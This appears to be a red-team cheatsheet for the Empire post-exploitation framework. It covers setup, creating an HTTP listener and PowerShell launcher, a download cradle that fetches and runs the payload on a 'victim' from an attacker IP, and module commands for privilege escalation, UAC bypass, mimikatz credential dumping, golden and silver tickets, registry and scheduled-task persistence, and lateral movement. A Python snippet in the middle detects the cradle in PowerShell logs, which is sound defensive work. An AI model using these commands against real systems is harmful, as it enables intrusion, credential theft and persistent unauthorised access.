
Empire

https://adsecurity.org/wp-content/uploads/2019/09/2019-DerbyCon-ActiveDirectorySecurity-BeyondTheEasyButton-Metcalf.pdf
Empire Repo

Empire Cheatsheet

Setup Empire

docker pull empireproject/empire
docker run -it empireproject/empire /bin/bash
root@5e3c3ad291b1:/opt/Empire# pip install pefile
root@5e3c3ad291b1:/opt/Empire# ./empire

Creating a launcher

Searching Modules:

(Empire) > searchmodule portscan

 powershell/situational_awareness/network/portscan

	Does a simple port scan using regular sockets, based (pretty) loosely
	on nmap.

Creating a listener and launcher:

(Empire: listeners) > uselistener http
(Empire: listeners/http) > set Host http://10.10.1.13:8001
(Empire: listeners/http) > set Port 8001
(Empire: listeners/http) > launcher powershell
# Save the launcher output to empire.ps1 and serve it from a web server
sudo python -m SimpleHTTPServer 80

Load module on Victim:

IEX(New-Object Net.WebClient).DownloadString('http://10.10.1.13/empire.ps1')
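From the defender's side, the download cradle above (and the base64 `-enc` form the `launcher powershell` output takes, assumed here) is exactly what PowerShell Script Block Logging (Event ID 4104) records. The following Python is an added example, not part of this cheatsheet, that runs two detection rules over constructed sample `ScriptBlockText` values and also decodes the `-enc` argument (UTF-16LE base64) so the cradle hidden inside an encoded launcher is caught too:

```python
import base64
import re

def _enc(cmd: str) -> str:
    """Encode a command the way PowerShell's -EncodedCommand expects (UTF-16LE, base64)."""
    return base64.b64encode(cmd.encode("utf-16le")).decode("ascii")

CRADLE = "IEX(New-Object Net.WebClient).DownloadString('http://10.10.1.13/empire.ps1')"

# Constructed sample ScriptBlockText values (Event ID 4104); not real captures.
SAMPLE_BLOCKS = [
    CRADLE,                                                        # plain cradle
    "Get-ChildItem C:\\Users | Where-Object { $_.Name -like 'a*' }",  # benign admin script
    "powershell -noP -sta -w 1 -enc " + _enc(CRADLE),              # encoded, hidden-window launcher
    "Invoke-WebRequest https://example.com/update.zip -OutFile C:\\tmp\\u.zip",  # benign download
]

# Detection rules: IEX + WebClient.DownloadString, and the hidden-window encoded launch shape.
RULES = {
    "download_cradle": re.compile(r"(?i)\b(iex|invoke-expression)\b.*net\.webclient.*downloadstring"),
    "hidden_encoded_launch": re.compile(r"(?i)\bpowershell\b.*-nop\b.*-w\s+1\b.*-enc\b"),
}
ENC_ARG = re.compile(r"(?i)-(?:enc|encodedcommand)\s+([A-Za-z0-9+/=]+)")

def decode_encoded_command(text: str):
    """Return the decoded -enc/-EncodedCommand payload, or None if absent or malformed."""
    m = ENC_ARG.search(text)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None

def classify(block: str) -> list:
    """Rule names that fire on the raw block, plus '(decoded)' hits on any decoded -enc payload."""
    hits = [name for name, rx in RULES.items() if rx.search(block)]
    decoded = decode_encoded_command(block)
    if decoded:
        hits += [f"{name} (decoded)" for name, rx in RULES.items() if rx.search(decoded)]
    return hits

def scan(blocks) -> list:
    """Pair each block index with its hits; empty lists are the blocks that look benign."""
    return [(i, classify(b)) for i, b in enumerate(blocks)]

if __name__ == "__main__":
    for i, hits in scan(SAMPLE_BLOCKS):
        print(i, hits or "clean")
```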

Interacting with an agent

Creating a Backup agent:

(Empire: listeners/http) > back
(Empire: listeners) > back
(Empire) > agents
(Empire: agents) > interact [agent_name]
#Make a background script in case the first dies
(Empire: UCVZ81NY) > spawn http

Run Custom Modules:

(Empire: UCVZ81NY) > usemodule powershell/privesc/powerup/allchecks
(Empire: UCVZ81NY) > usemodule powershell/privesc/gpp
(Empire: UCVZ81NY) > usemodule powershell/management/psinject <PID>
(Empire: UCVZ81NY) > usemodule powershell/credentials/mimikatz/logonpasswords
(Empire: UCVZ81NY) > usemodule powershell/privesc/bypassuac_wscript
(Empire: UCVZ81NY) > usemodule powershell/credentials/mimikatz/golden_ticket
(Empire: UCVZ81NY) > usemodule powershell/credentials/mimikatz/silver_ticket

(Empire: UCVZ81NY) > usemodule powershell/persistence/userland/registry
(Empire: UCVZ81NY) > usemodule powershell/persistence/userland/schtasks

(Empire: UCVZ81NY) > usemodule powershell/situational_awareness/network/powerview/share_finder
(Empire: powershell/situational_awareness/network/powerview/share_finder) > set CheckShareAccess

Run Modules:

(Empire: UCVZ81NY) > usemodule lateral_movement/invoke_portfwd

Create a new module (plugin)

Make a Powershell Template:

cp Empire/lib/modules/powershell_template.py .